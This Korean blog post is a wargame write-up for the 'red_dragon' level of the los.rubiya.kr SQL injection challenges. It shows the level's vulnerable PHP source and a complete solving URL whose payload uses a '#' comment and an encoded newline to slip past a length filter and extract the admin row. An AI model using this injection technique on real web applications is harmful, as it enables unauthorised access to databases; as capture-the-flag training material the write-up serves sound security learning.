웹찢남

red_dragon-writeup 본문

WEB_HACKING/los.rubiya.kr

red_dragon-writeup

harry595 2020. 1. 29. 21:44


<?php
  include "./config.php";
  login_chk();
  $db dbconnect();
  if(preg_match('/prob|_|\./i'$_GET['id'])) exit("No Hack ~_~");
  if(strlen($_GET['id']) > 7) exit("too long string");
  $no is_numeric($_GET['no']) ? $_GET['no'] : 1;
  $query "select id from prob_red_dragon where id='{$_GET['id']}' and no={$no}";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['id']) echo "<h2>Hello {$result['id']}</h2>";

  $query "select no from prob_red_dragon where id='admin'"// if you think challenge got wrong, look column name again.
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if($result['no'] === $_GET['no']) solve("red_dragon");
  highlight_file(__FILE__);
?>

 

id에 글자 수가 제한되어있다. 그래서 바로 #+%0a를 쓰기로 했다.

위의 생각으로 코드를 짜면 아래와 같은 url을 얻을 수 있다.

 

https://los.rubiya.kr/chall/red_dragon_b787de2bfe6bc3454e2391c4e7bb5de8.php?id=%27||no%3E%23&no=%0a100000000 

 

이를 사용해 코드를 짜면 CLEAR!!!

           

'WEB_HACKING > los.rubiya.kr' 카테고리의 다른 글

frankenstein-writeup  (0) 2020.01.29
blue_dragon-writeup  (0) 2020.01.29
green_dragon-writeup  (0) 2020.01.29
evil_wizard-writeup  (0) 2020.01.29
hell_fire-writeup  (0) 2020.01.29
'WEB_HACKING/los.rubiya.kr' Related Articles more
Comments